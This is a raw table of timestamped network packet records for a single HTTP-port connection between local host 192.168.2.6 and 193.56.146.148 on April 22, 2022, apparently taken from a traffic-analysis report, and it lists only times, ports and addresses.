Apr 22, 2022 16:17:41.550297022 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.550309896 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550327063 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550343990 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550348043 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.550360918 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550379038 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550393105 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.550396919 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550412893 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550422907 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.550430059 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550446987 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550463915 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.550465107 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550482035 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550498009 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550501108 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.550515890 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550530910 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.550534010 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550549984 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550558090 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.550569057 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550585985 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550586939 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.550602913 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550621033 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550637960 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.550672054 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.621085882 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621128082 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621155024 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621185064 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621212959 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621243000 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621242046 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.621273041 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621289968 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.621300936 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.621309996 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.621318102 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621345997 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621373892 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621376991 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.621396065 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.621402025 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621429920 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621448040 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.621459961 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621464014 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.621471882 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.621490002 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621519089 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621520042 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.621537924 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.621545076 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621572971 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621572971 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.621588945 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.621601105 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621629000 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621655941 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621656895 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.621676922 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.621685028 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621712923 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621731043 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.621742010 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621742964 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.621768951 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621769905 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.621788025 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.621797085 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621808052 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.621825933 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621840954 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.621854067 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621881962 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.621882915 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621911049 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621917009 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.621934891 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.621939898 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621953011 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.621969938 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.621997118 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622018099 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622025967 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622030020 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622037888 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622054100 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622081041 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622081995 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622100115 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622108936 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622122049 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622138977 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622179985 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622188091 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622198105 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622222900 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622251987 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622279882 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622279882 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622307062 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622308016 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622344017 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622344971 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622361898 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622370958 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622389078 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622399092 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622426987 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622427940 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622445107 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622457981 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622472048 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622493982 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622520924 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622524023 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622539997 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622551918 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622562885 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622581005 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622595072 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622610092 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622625113 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622637033 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622664928 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622664928 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622692108 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622693062 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622708082 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622723103 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622739077 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622750998 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622766018 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622780085 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622795105 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622807980 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622832060 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622836113 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622848988 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622864008 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622879982 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622891903 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622910976 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622920990 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622935057 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622950077 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622968912 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.622977972 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.622994900 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623006105 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623023033 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623034954 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623047113 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623063087 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623090982 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623110056 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623117924 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623123884 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623135090 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623147011 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623166084 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623176098 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623197079 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623205900 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623223066 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623234034 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623260021 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623262882 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623275995 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623291969 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623317957 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623322010 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623337984 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623347044 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623363972 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623373985 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623392105 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623402119 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623419046 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623433113 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623456001 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623461962 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623476982 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623492002 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623517036 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623521090 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623536110 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623548985 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623564959 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623577118 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623590946 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623606920 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623625040 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623636007 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623651028 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623665094 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623692036 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623692989 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623712063 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623720884 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623738050 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623749971 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623766899 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623778105 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623806953 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623810053 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623826027 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623836040 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623853922 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623864889 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623883963 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623894930 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623914957 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623922110 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623939037 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623951912 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623970032 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.623980999 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.623996973 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.624008894 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.624026060 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.624037981 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.624052048 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.624066114 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.624084949 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.624094009 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.624110937 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.624124050 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.624136925 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.624151945 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.624180079 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.624197960 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.624208927 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.624212027 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.624223948 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.624234915 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.624258995 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.624274969 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.858429909 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.859730959 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.148870945 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.218995094 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219147921 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219166040 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219183922 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219240904 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.219273090 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.219450951 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219470978 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219491005 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219501019 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.219508886 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219526052 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219543934 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219553947 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.219563961 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219580889 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219593048 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.219598055 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219618082 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219635010 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219640970 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.219651937 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219669104 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219671011 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.219686031 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219693899 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.219703913 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219717026 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.219721079 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219738960 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219755888 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219758987 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.219774008 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219790936 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219798088 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.219808102 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219820976 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.219825029 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219841957 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219856024 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.219857931 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219876051 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219894886 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219897032 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.219919920 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219921112 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.219938040 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219954967 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219959021 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.219971895 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219989061 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.219999075 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220007896 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220022917 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220025063 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220042944 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220061064 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220068932 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220078945 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220096111 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220112085 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220118046 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220129967 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220140934 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220146894 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220165014 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220168114 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220184088 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220186949 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220201015 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220218897 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220220089 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220237970 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220243931 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220254898 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220273018 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220279932 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220292091 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220302105 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220309973 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220330000 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220339060 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220345974 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220364094 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220376968 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220381975 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220398903 CEST	80	49842	193.56.146.148	192.168.2.6
